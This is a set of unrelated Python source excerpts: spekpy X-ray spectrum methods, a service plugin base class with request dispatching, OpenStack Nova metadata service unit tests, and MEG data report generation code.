:param kwargs: A set of keyword arguments for parameters that can
temporarly be used for calculations
"""
calc_params = copy.deepcopy(self.state.spectrum_parameters)
for keyword in kwargs:
if hasattr(calc_params, keyword):
setattr(calc_params, keyword, kwargs[keyword])
else:
raise Exception('Keyword argument '+ keyword +' not recognized')
if getattr(calc_params, 'ref_kerma') is not None and \
getattr(calc_params, 'ref_flu') is not None:
raise Exception("A reference air Kerma and reference fluence "
"cannot both be specified!")
if 'x' in kwargs or 'y' in kwargs or 'z' in kwargs:
if self.state.model_parameters.physics == Spek.alias('kqp') or \
self.state.model_parameters.physics == Spek.alias('sim'):
x=self.state.spectrum_parameters.x
y=self.state.spectrum_parameters.y
z=self.state.spectrum_parameters.z
x_calc=calc_params.x
y_calc=calc_params.y
z_calc=calc_params.z
if not isclose(x_calc/z_calc,x/z,atol=1e-5) or \
not isclose(y_calc/z_calc,y/z,atol=1e-5):
raise Exception('Cannot update spatial position.\n' +
'Specified value of "physics" keyword prohibits a ' +
'change in take-off angles on-the-fly.\n' +
'Try using the "set()" method to change x, y or z.')
return calc_params
def spectrum_from_model(self):
"""
Internal method to get spectra from spekpy's model of photon emission
:return:
"""
self.model = SpekModel().get_spectrum_parameters(self)
def spectrum_from_external_source(self,z,mas):
"""
Internal method used in loading an eternal spectrum from a file
:param float z: The focus-to-detector distance for the file spectrum
:param float mAs: The exposure setting for the file spectrum
:return:
"""
k, brem, char, dk = read_spectrum_from_disk(self)
number_of_incident_electrons = mas * Const.conversion_A2mA \
/ Const.electron_charge
# Convert external fluence spectrum to photons per solid angle per
# ... incident electron
self.model.brem_k = brem * z**2 / number_of_incident_electrons
self.model.char_k = char * z**2 / number_of_incident_electrons
self.model.k = k
self.state.model_parameters.dk = dk
self.state.model_parameters.kvp = max(k) + 0.5*dk
def set(self, **kwargs):
"""
A method to set parameters in the spekpy state
:param kwargs: A variable number of keyword arguments to change the
state of spekpy
:return:
"""
self.set_state_parameters(**kwargs)
return self
def summarize(self, mode='minimal'):
"""
A method to print a summary of the current state and results thereof to
the console
:param str mode: The mode of summarization. Either 'full' or 'minimal'
(default)
:return:
"""
if mode == 'full':
self.state.tmp_results = self.get_std_results()
summarization = self.state.get_current_state_str(mode)
elif mode == 'minimal':
summarization = self.state.get_current_state_str(mode)
else:
raise Exception("The mode must be either full or minimal "
"(default)")
print(summarization)
def filter(self, matl, t):
"""
A method to alter the spectral filtration
Example usage:
spk.filter('Al', 1)
:param str matl: The name of the desired filter material
:param float t: The thickness of the desired filtration
:return:
"""
change_filtration(self, matl, t)
| |
# (c) Copyright 2015-2016 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
import logging
import inspect
import pykka
import copy
import time
import traceback
from bll.common import util
from bll.common.exception import InvalidBllRequestException, BllException
from bll.api.auth_token import TokenHelpers
from bll.api.response import BllResponse
from bll.api.request import BllRequest
from bll import api
from bll.common.job_status import get_job_status, update_job_status
from bll.common import i18n
from bll.common.util import context, new_txn_id
from stevedore import driver
from requests.exceptions import HTTPError
LOG = logging.getLogger(__name__)
def expose(operation=None, action='GET', is_long=False):
""" A decorator for exposing methods as BLL operations/actions
Keyword arguments:
* operation
the name of the operation that the caller should supply in
the BLL request. If this optional argument is not supplied,
then the operation name will be the name of the method being
decorated.
* action
the name of the action (typically ``GET``, ``PUT``, ``DELETE`` or
``POST``) that will be matched against the BLL request. If this
optional argument is not supplied, then the dispatching
mechanism will ignore the action.
* is_long
indicates that the method being decorated is a long-running
function. Long-running methods may either be called once
(via complete) or twice (via handle for validation and via
for the rest) depending on their signature -- if the
method has an argument (other than self), then it will be
called twice, in which case the parameter will be populated
with a boolean indicating whether it is being called via
handle; in this case, the function should return a recommended
polling interval.
Note, if you override handle or complete, this decorations will be ignored!
When a normal (short-running) method is called, its return value should
just be the data portion of the response. The handle method will take
care of building a full BllResponse structure and placing this return
value in the data portion. Otherwise, if there are any problems, the
method should just throw an appropriate exception. The handle method
will catch the exception and package it up in an appropriate BllResponse
object.
The decorator can be applied multiple times to the same function, in
order to permit a function to be called via multiple operations. For
example::
class MySvc(SvcBase)
@expose('add_stuff')
@expose('update_stuff')
def add_or_update(self):
...
"""
def decorate(f):
f.exposed = True
if not hasattr(f, 'operation'):
f.operation = []
f.operation.append(operation or f.__name__)
if action:
f.action = action
if is_long:
f.is_long = is_long
# normally a decorator returns a wrapped function, but here
# we return f unmodified, after registering it
return f
return decorate
class SvcBase(pykka.ThreadingActor):
"""
Base class for plugins.
"""
def __init__(self, bll_request=None):
super(SvcBase, self).__init__()
# Extract common fields into attributes
if not isinstance(bll_request, BllRequest):
raise InvalidBllRequestException('Invalid request class')
self.request = bll_request
self.response = BllResponse(self.request)
if api.AUTH_TOKEN in self.request:
self.token_helper = TokenHelpers(self.request.get(api.AUTH_TOKEN))
self.token = self.request.get(api.AUTH_TOKEN)
request_data = self.request.get(api.DATA, {})
self.action = self.request.get(api.ACTION)
self.api_version = None
self.operation = None
self.data = {}
self.txn_id = self.request.txn_id
self.region = self.request.get(api.REGION)
# Assign _ as a member variable in this plugin class for localizing
# messages
self._ = i18n.get_(self.request.get(api.LANGUAGE, 'en'))
# Extract request data, filtering out known keys
for k, v in request_data.iteritems():
if k == api.OPERATION:
self.operation = v
elif k == 'suggest_sync':
# Omit the obsolete, poorly-supported suggest_sync flag
pass
elif k == api.VERSION:
self.api_version = v
else:
self.data[k] = v
@staticmethod
def spawn_service(bll_request):
"""
Call the targeted service, using stevedore to load the plugin whose
name matches the 'target' field of the incoming request.
"""
srv = None
# Assign _ in this function for localizing messages
_ = i18n.get_(bll_request.get(api.LANGUAGE, 'en'))
try:
mgr = driver.DriverManager(
namespace='bll.plugins',
name=bll_request.get(api.TARGET))
srv = mgr.driver.start(bll_request=bll_request).proxy()
reply = srv.sc_handle()
result = reply.get()
srv.sc_complete()
return result
except Exception as e:
LOG.exception('spawn_service failed')
if srv is not None:
srv.stop()
response = BllResponse(bll_request)
if isinstance(e, HTTPError):
message = e.message
elif isinstance(e, BllException):
# Localize the overview field from the BllException
prefix = _(e.overview)
message = _("{0}: {1}").format(prefix, e)
else:
message = "%s" % e
response.error(message.rstrip())
return response
def handle(self):
"""
Handle the request by dispatching the request to the appropriate
method. Override this method if desired, to implement your own
dispatching and execution of short-running work.
"""
if not self.operation and not self.action:
raise InvalidBllRequestException(self._(
"Operation and action missing"))
method = self._get_method(self.operation, self.action)
if method is None:
raise InvalidBllRequestException(
self._("Unsupported operation: {}").format(self.operation))
if getattr(method, 'is_long', False):
self.response[api.PROGRESS] = dict(percentComplete=0)
self.response[api.STATUS] = api.STATUS_INPROGRESS
polling_interval = 10
if method.im_func.func_code.co_argcount > 1:
# If the long-running method expects an argument, call it
# set to True and expect a polling interval in return
polling_interval = method(True) or polling_interval
self.response[api.POLLING_INTERVAL] = \
getattr(self, api.POLLING_INTERVAL, 10)
self.update_job_status(percentage_complete=0)
return self.response
data = method()
# In cases where we don't have the data in the response, it
# had better be in the return value.
# i.e. compute_summary_service: resource_history()
if not self.response[api.DATA]:
self.response[api.DATA] = data
self.response[api.PROGRESS] = dict(percentComplete=100)
self.response.complete()
return self.response
def complete(self):
"""
Complete the request. Override this method and do long running
processing here.
"""
if not self.operation and not self.action:
return
method = self._get_method(self.operation, self.action)
if method is None:
return
if getattr(method, 'is_long', False):
try:
if method.im_func.func_code.co_argcount > 1:
# If the long-running method expects an argument, call it
# set to False to indicate that it is being called
# during complete
response = method(False)
else:
response = method()
# Permit the calling function to just return a normal
# value, and then just add it to the 'data' element of the
# existing self.response
if isinstance(response, BllResponse):
self.response = response
else:
self.response[api.DATA] = response
self.response[api.PROGRESS] = dict(percentComplete=100)
self.response.complete()
except Exception as e:
self.response.error("%s" % e)
return self.response
def _get_method(self, operation=None, action=None):
"""
Use inspection to get the name of the @exposed function that
corresponds to the operation and action being requested
If there is only one method whose exposed name matches the operation,
then that method is returned, regardless of the action. If there is
more, then the action will be consulted to decide which to return.
"""
candidates = []
# Find all candidates -- those members whose name matches the
# operation, ignoring the action.
for name, f in inspect.getmembers(self, inspect.ismethod):
# Only look at those that are exposed
if not getattr(f, 'exposed', False):
continue
# If operation is specified, the function must expose that op
op_list = getattr(f, 'operation', [])
if operation and operation not in op_list:
continue
candidates.append((name, f))
if not candidates:
return
# In most cases, there is only a single function with the given
# operation, so we will return that.
if len(candidates) == 1:
name, f = candidates[0]
return f
# If action is specified, the function must expose that action
for name, f in candidates:
if action == getattr(f, 'action', None):
return f
def sc_handle(self):
"""
Handle the request. Called by the SvcCollection class. Do not override,
this method. Override method handle.
"""
context.txn_id = self.request.txn_id
reply = self.handle()
return copy.deepcopy(reply)
def sc_complete(self):
"""
complete the request. Called by the SvcCollection class. Do not
override this method. Override method 'complete'.
"""
try:
bll_response = self.complete()
if bll_response is not None:
self.put_resource(self.request.txn_id, bll_response)
except Exception as e:
LOG.exception('sc_complete failed.')
self.response.exception(traceback.format_exc())
self.put_resource(self.request.txn_id, self.response.error(
"%s" % e))
finally:
self.stop()
def update_job_status(self, msg=None, percentage_complete=0,
txn_id=None, **kwargs):
if percentage_complete is not None:
self.response[api.PROGRESS] = {api.PERCENT_COMPLETE:
percentage_complete}
if msg:
self.response[api.DATA] = msg
self.response.update(**kwargs)
txn = txn_id or self.txn_id
update_job_status(txn, self.response)
def put_resource(self, txn_id, msg):
update_job_status(txn_id, msg)
@classmethod
def is_available(cls, available_services):
"""
Returns a boolean to indicate whether this plugin is available, i.e.,
that all of the dependent services and requirements that this plugin
needs are available. The function is supplied a lists of openstack
services from keystone that are available.
This check will not be called each time the plugin is executed, so it
can afford to be somewhat slow. It is expected to only be called when
the client (UI) requests a list of available plugins.
"""
needs = cls.needs_services()
for service in needs:
if service not in available_services:
return False
return True
@classmethod
| |
<gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for metadata service."""
import base64
import hashlib
import hmac
import json
import re
try:
import cPickle as pickle
except ImportError:
import pickle
import mox
from oslo.config import cfg
import webob
from nova.api.metadata import base
from nova.api.metadata import handler
from nova.api.metadata import password
from nova import block_device
from nova.compute import flavors
from nova.conductor import api as conductor_api
from nova import context
from nova import db
from nova.db.sqlalchemy import api
from nova import exception
from nova.network import api as network_api
from nova.objects import instance as instance_obj
from nova import test
from nova.tests import fake_instance
from nova.tests import fake_network
from nova.tests.objects import test_security_group
from nova.virt import netutils
CONF = cfg.CONF
USER_DATA_STRING = ("This is an encoded string")
ENCODE_USER_DATA_STRING = base64.b64encode(USER_DATA_STRING)
INSTANCE = fake_instance.fake_db_instance(**
{'id': 1,
'uuid': 'b65cee2f-8c69-4aeb-be2f-f79742548fc2',
'name': 'fake',
'project_id': 'test',
'key_name': "mykey",
'key_data': "ssh-rsa AAAAB3Nzai....N3NtHw== someuser@somehost",
'host': 'test',
'launch_index': 1,
'instance_type': {'name': 'm1.tiny'},
'reservation_id': 'r-xxxxxxxx',
'user_data': ENCODE_USER_DATA_STRING,
'image_ref': 7,
'vcpus': 1,
'fixed_ips': [],
'root_device_name': '/dev/sda1',
'info_cache': {'network_info': []},
'hostname': 'test.novadomain',
'display_name': 'my_displayname',
'metadata': {},
'system_metadata': {},
})
def fake_inst_obj(context):
return instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), INSTANCE,
expected_attrs=['metadata', 'system_metadata'])
def get_default_sys_meta():
return flavors.save_flavor_info(
{}, flavors.get_default_flavor())
def return_non_existing_address(*args, **kwarg):
raise exception.NotFound()
def fake_InstanceMetadata(stubs, inst_data, address=None,
sgroups=None, content=[], extra_md={},
vd_driver=None, network_info=None):
if sgroups is None:
sgroups = [dict(test_security_group.fake_secgroup,
name='default')]
def sg_get(*args, **kwargs):
return sgroups
stubs.Set(api, 'security_group_get_by_instance', sg_get)
return base.InstanceMetadata(inst_data, address=address,
content=content, extra_md=extra_md,
vd_driver=vd_driver, network_info=network_info)
def fake_request(stubs, mdinst, relpath, address="127.0.0.1",
fake_get_metadata=None, headers=None,
fake_get_metadata_by_instance_id=None):
def get_metadata_by_remote_address(address):
return mdinst
app = handler.MetadataRequestHandler()
if fake_get_metadata is None:
fake_get_metadata = get_metadata_by_remote_address
if stubs:
stubs.Set(app, 'get_metadata_by_remote_address', fake_get_metadata)
if fake_get_metadata_by_instance_id:
stubs.Set(app, 'get_metadata_by_instance_id',
fake_get_metadata_by_instance_id)
request = webob.Request.blank(relpath)
request.remote_addr = address
if headers is not None:
request.headers.update(headers)
response = request.get_response(app)
return response
class MetadataTestCase(test.TestCase):
def setUp(self):
super(MetadataTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.instance = fake_inst_obj(self.context)
self.instance.system_metadata = get_default_sys_meta()
self.flags(use_local=True, group='conductor')
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
def test_can_pickle_metadata(self):
# Make sure that InstanceMetadata is possible to pickle. This is
# required for memcache backend to work correctly.
md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
pickle.dumps(md, protocol=0)
def test_user_data(self):
inst = self.instance.obj_clone()
inst['user_data'] = base64.b64encode("happy")
md = fake_InstanceMetadata(self.stubs, inst)
self.assertEqual(
md.get_ec2_metadata(version='2009-04-04')['user-data'], "happy")
def test_no_user_data(self):
inst = self.instance.obj_clone()
inst.user_data = None
md = fake_InstanceMetadata(self.stubs, inst)
obj = object()
self.assertEqual(
md.get_ec2_metadata(version='2009-04-04').get('user-data', obj),
obj)
def test_security_groups(self):
inst = self.instance.obj_clone()
sgroups = [dict(test_security_group.fake_secgroup, name='default'),
dict(test_security_group.fake_secgroup, name='other')]
expected = ['default', 'other']
md = fake_InstanceMetadata(self.stubs, inst, sgroups=sgroups)
data = md.get_ec2_metadata(version='2009-04-04')
self.assertEqual(data['meta-data']['security-groups'], expected)
def test_local_hostname_fqdn(self):
md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
data = md.get_ec2_metadata(version='2009-04-04')
self.assertEqual(data['meta-data']['local-hostname'],
"%s.%s" % (self.instance['hostname'], CONF.dhcp_domain))
def test_format_instance_mapping(self):
# Make sure that _format_instance_mappings works.
ctxt = None
instance_ref0 = {'id': 0,
'uuid': 'e5fe5518-0288-4fa3-b0c4-c79764101b85',
'root_device_name': None}
instance_ref1 = {'id': 0,
'uuid': 'b65cee2f-8c69-4aeb-be2f-f79742548fc2',
'root_device_name': '/dev/sda1'}
def fake_bdm_get(ctxt, uuid):
return [{'volume_id': 87654321,
'snapshot_id': None,
'no_device': None,
'source_type': 'volume',
'destination_type': 'volume',
'delete_on_termination': True,
'device_name': '/dev/sdh'},
{'volume_id': None,
'snapshot_id': None,
'no_device': None,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': 'swap',
'delete_on_termination': None,
'device_name': '/dev/sdc'},
{'volume_id': None,
'snapshot_id': None,
'no_device': None,
'source_type': 'blank',
'destination_type': 'local',
'guest_format': None,
'delete_on_termination': None,
'device_name': '/dev/sdb'}]
self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
fake_bdm_get)
expected = {'ami': 'sda1',
'root': '/dev/sda1',
'ephemeral0': '/dev/sdb',
'swap': '/dev/sdc',
'ebs0': '/dev/sdh'}
capi = conductor_api.LocalAPI()
self.assertEqual(base._format_instance_mapping(capi, ctxt,
instance_ref0), block_device._DEFAULT_MAPPINGS)
self.assertEqual(base._format_instance_mapping(capi, ctxt,
instance_ref1), expected)
def test_pubkey(self):
md = fake_InstanceMetadata(self.stubs, self.instance.obj_clone())
pubkey_ent = md.lookup("/2009-04-04/meta-data/public-keys")
self.assertEqual(base.ec2_md_print(pubkey_ent),
"0=%s" % self.instance['key_name'])
self.assertEqual(base.ec2_md_print(pubkey_ent['0']['openssh-key']),
self.instance['key_data'])
def test_image_type_ramdisk(self):
inst = self.instance.obj_clone()
inst['ramdisk_id'] = 'ari-853667c0'
md = fake_InstanceMetadata(self.stubs, inst)
data = md.lookup("/latest/meta-data/ramdisk-id")
self.assertIsNotNone(data)
self.assertTrue(re.match('ari-[0-9a-f]{8}', data))
def test_image_type_kernel(self):
inst = self.instance.obj_clone()
inst['kernel_id'] = 'aki-c2e26ff2'
md = fake_InstanceMetadata(self.stubs, inst)
data = md.lookup("/2009-04-04/meta-data/kernel-id")
self.assertTrue(re.match('aki-[0-9a-f]{8}', data))
self.assertEqual(
md.lookup("/ec2/2009-04-04/meta-data/kernel-id"), data)
inst.kernel_id = None
md = fake_InstanceMetadata(self.stubs, inst)
self.assertRaises(base.InvalidMetadataPath,
md.lookup, "/2009-04-04/meta-data/kernel-id")
def test_check_version(self):
inst = self.instance.obj_clone()
md = fake_InstanceMetadata(self.stubs, inst)
self.assertTrue(md._check_version('1.0', '2009-04-04'))
self.assertFalse(md._check_version('2009-04-04', '1.0'))
self.assertFalse(md._check_version('2009-04-04', '2008-09-01'))
self.assertTrue(md._check_version('2008-09-01', '2009-04-04'))
self.assertTrue(md._check_version('2009-04-04', '2009-04-04'))
def test_InstanceMetadata_uses_passed_network_info(self):
network_info = []
self.mox.StubOutWithMock(netutils, "get_injected_network_template")
netutils.get_injected_network_template(network_info).AndReturn(False)
self.mox.ReplayAll()
base.InstanceMetadata(fake_inst_obj(self.context),
network_info=network_info)
def test_InstanceMetadata_invoke_metadata_for_config_drive(self):
inst = self.instance.obj_clone()
inst_md = base.InstanceMetadata(inst)
for (path, value) in inst_md.metadata_for_config_drive():
self.assertIsNotNone(path)
def test_InstanceMetadata_queries_network_API_when_needed(self):
network_info_from_api = []
self.mox.StubOutWithMock(network_api.API, "get_instance_nw_info")
network_api.API.get_instance_nw_info(
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(network_info_from_api)
self.mox.StubOutWithMock(netutils, "get_injected_network_template")
netutils.get_injected_network_template(
network_info_from_api).AndReturn(False)
self.mox.ReplayAll()
base.InstanceMetadata(fake_inst_obj(self.context))
def test_local_ipv4_from_nw_info(self):
nw_info = fake_network.fake_get_instance_nw_info(self.stubs,
num_networks=2)
expected_local = "192.168.1.100"
md = fake_InstanceMetadata(self.stubs, self.instance,
network_info=nw_info)
data = md.get_ec2_metadata(version='2009-04-04')
self.assertEqual(data['meta-data']['local-ipv4'], expected_local)
def test_local_ipv4_from_address(self):
nw_info = fake_network.fake_get_instance_nw_info(self.stubs,
num_networks=2)
expected_local = "fake"
md = fake_InstanceMetadata(self.stubs, self.instance,
network_info=nw_info, address="fake")
data = md.get_ec2_metadata(version='2009-04-04')
self.assertEqual(data['meta-data']['local-ipv4'], expected_local)
def test_local_ipv4_from_nw_none(self):
md = fake_InstanceMetadata(self.stubs, self.instance,
network_info=[])
data = md.get_ec2_metadata(version='2009-04-04')
self.assertEqual(data['meta-data']['local-ipv4'], '')
class OpenStackMetadataTestCase(test.TestCase):
def setUp(self):
super(OpenStackMetadataTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.instance = fake_inst_obj(self.context)
self.instance['system_metadata'] = get_default_sys_meta()
self.flags(use_local=True, group='conductor')
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
def test_with_primitive_instance(self):
mdinst = fake_InstanceMetadata(self.stubs, INSTANCE)
result = mdinst.lookup('/openstack')
self.assertIn('latest', result)
def test_top_level_listing(self):
# request for /openstack/<version>/ should show metadata.json
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
result = mdinst.lookup("/openstack")
# trailing / should not affect anything
self.assertEqual(result, mdinst.lookup("/openstack/"))
# the 'content' should not show up in directory listing
self.assertNotIn(base.CONTENT_DIR, result)
self.assertIn('2012-08-10', result)
self.assertIn('latest', result)
def test_version_content_listing(self):
# request for /openstack/<version>/ should show metadata.json
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
listing = mdinst.lookup("/openstack/2012-08-10")
self.assertIn("meta_data.json", listing)
def test_metadata_json(self):
inst = self.instance.obj_clone()
content = [
('/etc/my.conf', "content of my.conf"),
('/root/hello', "content of /root/hello"),
]
mdinst = fake_InstanceMetadata(self.stubs, inst,
content=content)
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
mdjson = mdinst.lookup("/openstack/latest/meta_data.json")
mddict = json.loads(mdjson)
self.assertEqual(mddict['uuid'], self.instance['uuid'])
self.assertIn('files', mddict)
self.assertIn('public_keys', mddict)
self.assertEqual(mddict['public_keys'][self.instance['key_name']],
self.instance['key_data'])
self.assertIn('launch_index', mddict)
self.assertEqual(mddict['launch_index'], self.instance['launch_index'])
# verify that each of the things we put in content
# resulted in an entry in 'files', that their content
# there is as expected, and that /content lists them.
for (path, content) in content:
fent = [f for f in mddict['files'] if f['path'] == path]
self.assertTrue((len(fent) == 1))
fent = fent[0]
found = mdinst.lookup("/openstack%s" % fent['content_path'])
self.assertEqual(found, content)
def test_extra_md(self):
# make sure extra_md makes it through to metadata
inst = self.instance.obj_clone()
extra = {'foo': 'bar', 'mylist': [1, 2, 3],
'mydict': {"one": 1, "two": 2}}
mdinst = fake_InstanceMetadata(self.stubs, inst, extra_md=extra)
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
mddict = json.loads(mdjson)
for key, val in extra.iteritems():
self.assertEqual(mddict[key], val)
def test_password(self):
# make sure extra_md makes it through to metadata
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
result = mdinst.lookup("/openstack/latest/password")
self.assertEqual(result, password.handle_password)
def test_userdata(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
userdata_found = mdinst.lookup("/openstack/2012-08-10/user_data")
self.assertEqual(USER_DATA_STRING, userdata_found)
# since we had user-data in this instance, it should be in listing
self.assertIn('user_data', mdinst.lookup("/openstack/2012-08-10"))
inst.user_data = None
mdinst = fake_InstanceMetadata(self.stubs, inst)
# since this instance had no user-data it should not be there.
self.assertNotIn('user_data', mdinst.lookup("/openstack/2012-08-10"))
self.assertRaises(base.InvalidMetadataPath,
mdinst.lookup, "/openstack/2012-08-10/user_data")
def test_random_seed(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
# verify that 2013-04-04 has the 'random' field
mdjson = mdinst.lookup("/openstack/2013-04-04/meta_data.json")
mddict = json.loads(mdjson)
self.assertIn("random_seed", mddict)
self.assertEqual(len(base64.b64decode(mddict["random_seed"])), 512)
# verify that older version do not have it
mdjson = mdinst.lookup("/openstack/2012-08-10/meta_data.json")
self.assertNotIn("random_seed", json.loads(mdjson))
def test_no_dashes_in_metadata(self):
# top level entries in meta_data should not contain '-' in their name
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
mdjson = json.loads(mdinst.lookup("/openstack/latest/meta_data.json"))
self.assertEqual([], [k for k in mdjson.keys() if k.find("-") != -1])
def test_vendor_data_presense(self):
inst = self.instance.obj_clone()
mdinst = fake_InstanceMetadata(self.stubs, inst)
# verify that 2013-10-17 has the vendor_data.json file
result = mdinst.lookup("/openstack/2013-10-17")
self.assertIn('vendor_data.json', result)
# verify that older version do not have it
result = mdinst.lookup("/openstack/2013-04-04")
self.assertNotIn('vendor_data.json', result)
def test_vendor_data_response(self):
inst = self.instance.obj_clone()
mydata = {'mykey1': 'value1', 'mykey2': 'value2'}
class myVdriver(base.VendorDataDriver):
def __init__(self, *args, **kwargs):
super(myVdriver, self).__init__(*args, **kwargs)
data = mydata.copy()
uuid = kwargs['instance']['uuid']
data.update({'inst_uuid': uuid})
self.data = data
def get(self):
return self.data
mdinst = fake_InstanceMetadata(self.stubs, inst, vd_driver=myVdriver)
# verify that 2013-10-17 has the vendor_data.json file
vdpath = "/openstack/2013-10-17/vendor_data.json"
vd = json.loads(mdinst.lookup(vdpath))
# the instance should be passed through, and our class copies the
# uuid through to 'inst_uuid'.
self.assertEqual(vd['inst_uuid'], inst['uuid'])
# check the other expected values
for k, v in mydata.items():
self.assertEqual(vd[k], v)
class MetadataHandlerTestCase(test.TestCase):
"""Test that metadata is returning proper values."""
def setUp(self):
super(MetadataHandlerTestCase, self).setUp()
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
self.context = context.RequestContext('fake', 'fake')
self.instance = fake_inst_obj(self.context)
self.instance.system_metadata = get_default_sys_meta()
self.flags(use_local=True, group='conductor')
self.mdinst = fake_InstanceMetadata(self.stubs, self.instance,
address=None, sgroups=None)
def test_callable(self):
def verify(req, meta_data):
| |
if bad_file is not None:
sss_info.load_bad_channels(bad_file)
if sss_info is not None:
sss_info = sss_info.info
# pca / erm / erm_pca
extra_raws = dict()
for key, which, erm in [
('raw_pca', 'pca', False),
('raw_erm', 'raw', 'only'),
('raw_erm_pca', 'pca', 'only')]:
these_fnames = get_raw_fnames(
p, subj, which, erm, False, run_indices[si])
if len(these_fnames) and all(op.isfile(f) for f in these_fnames):
extra_raws[key], _ = _concat_resamp_raws(
p, subj, these_fnames, 'all', preload=True)
extra_raws[key].apply_proj()
raw_pca = extra_raws.get('raw_pca', None)
raw_erm = extra_raws.get('raw_erm', None)
raw_erm_pca = extra_raws.get('raw_erm_pca', None)
del extra_raws
# epochs
epochs_fname, _ = get_epochs_evokeds_fnames(p, subj, p.analyses)
_, epochs_fname = epochs_fname
has_epochs = op.isfile(epochs_fname)
# whitening and source localization
inv_dir = op.join(p.work_dir, subj, p.inverse_dir)
has_fwd = op.isfile(op.join(p.work_dir, subj, p.forward_dir,
subj + p.inv_tag + '-fwd.fif'))
with report_context():
#
# Custom pre-fun
#
pre_fun = p.report_params.get('pre_fun', None)
if pre_fun is not None:
print(' Pre fun ...'.ljust(LJUST), end='')
t0 = time.time()
pre_fun(report, p, subj)
print('%5.1f sec' % ((time.time() - t0),))
#
# Head coils
#
if p.report_params.get('good_hpi_count', True) and p.movecomp:
_report_good_hpi(report, fnames, p, subj)
else:
print(' HPI count skipped')
#
# cHPI SNR
#
if p.report_params.get('chpi_snr', True) and p.movecomp:
_report_chpi_snr(report, fnames, p, subj)
else:
print(' cHPI SNR skipped')
#
# Head movement
#
if p.report_params.get('head_movement', True) and p.movecomp:
_report_head_movement(report, fnames, p, subj, run_indices[si])
else:
print(' Head movement skipped')
#
# Raw segments
#
if p.report_params.get('raw_segments', True) and \
raw_pca is not None:
_report_raw_segments(report, raw_pca)
else:
print(' Raw segments skipped')
#
# PSD
#
if p.report_params.get('psd', True):
_report_raw_psd(report, raw, raw_pca, raw_erm, raw_erm_pca, p)
else:
print(' PSD skipped')
#
# SSP
#
section = 'SSP topomaps'
proj_nums = _proj_nums(p, subj)
if p.report_params.get('ssp_topomaps', True) and \
raw_pca is not None and np.sum(proj_nums) > 0:
assert sss_info is not None
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
figs = []
comments = []
proj_files = get_proj_fnames(p, subj)
duration = raw.times[-1]
if p.proj_extra is not None:
comments.append('Custom')
projs = read_proj(op.join(p.work_dir, subj, p.pca_dir,
p.proj_extra))
figs.append(plot_projs_topomap(projs, info=sss_info,
show=False))
if any(proj_nums[2]): # ERM
if 'preproc_cont-proj.fif' in proj_files:
if p.cont_as_esss:
extra = ' (eSSS)'
use_info = raw.info
else:
extra = ''
use_info = sss_info
comments.append('Continuous%s' % (extra,))
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
'preproc_cont-proj.fif'), use_info,
proj_nums[2], p.proj_meg, 'ERM', None,
duration))
if any(proj_nums[0]): # ECG
if 'preproc_ecg-proj.fif' in proj_files:
ecg_channel = _handle_dict(p.ecg_channel, subj)
comments.append('ECG')
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
'preproc_ecg-proj.fif'), sss_info,
proj_nums[0], p.proj_meg, 'ECG', ecg_channel,
duration))
for idx, kind in ((1, 'EOG'), (3, 'HEOG'), (4, 'VEOG')):
if any(proj_nums[idx]): # Blink
bk = dict(EOG='Blink').get(kind, kind)
if f'preproc_{bk.lower()}-proj.fif' in proj_files:
eog_channel = _handle_dict(
getattr(p, f'{kind.lower()}_channel'), subj)
comments.append(dict(EOG='Blink').get(kind, kind))
figs.append(_proj_fig(op.join(
p.work_dir, subj, p.pca_dir,
f'preproc_{bk.lower()}-proj.fif'), sss_info,
proj_nums[idx], p.proj_meg, kind, eog_channel,
duration))
captions = ['SSP epochs: %s' % c for c in comments]
report.add_figs_to_section(
figs, captions, section, image_format='png',
comments=comments)
print('%5.1f sec' % ((time.time() - t0),))
else:
print(' %s skipped' % section)
#
# Source alignment
#
section = 'Source alignment'
source_alignment = p.report_params.get('source_alignment', True)
if source_alignment is True or isinstance(source_alignment, dict) \
and has_sss and has_fwd:
assert sss_info is not None
kwargs = source_alignment
if isinstance(source_alignment, dict):
kwargs = dict(**source_alignment)
else:
assert source_alignment is True
kwargs = dict()
t0 = time.time()
print((' %s ... ' % section).ljust(LJUST), end='')
captions = [section]
try:
mne.viz.get_3d_backend() is not None
except Exception:
warnings.warn('Cannot plot alignment in Report, mayavi '
'could not be imported')
else:
subjects_dir = mne.utils.get_subjects_dir(
p.subjects_dir, raise_error=True)
bem, src, trans, _ = _get_bem_src_trans(
p, sss_info, subj, struc)
if len(mne.pick_types(sss_info, meg=True)):
coord_frame = 'meg'
else:
coord_frame = 'head'
with mlab_offscreen():
fig = mne.viz.create_3d_figure(
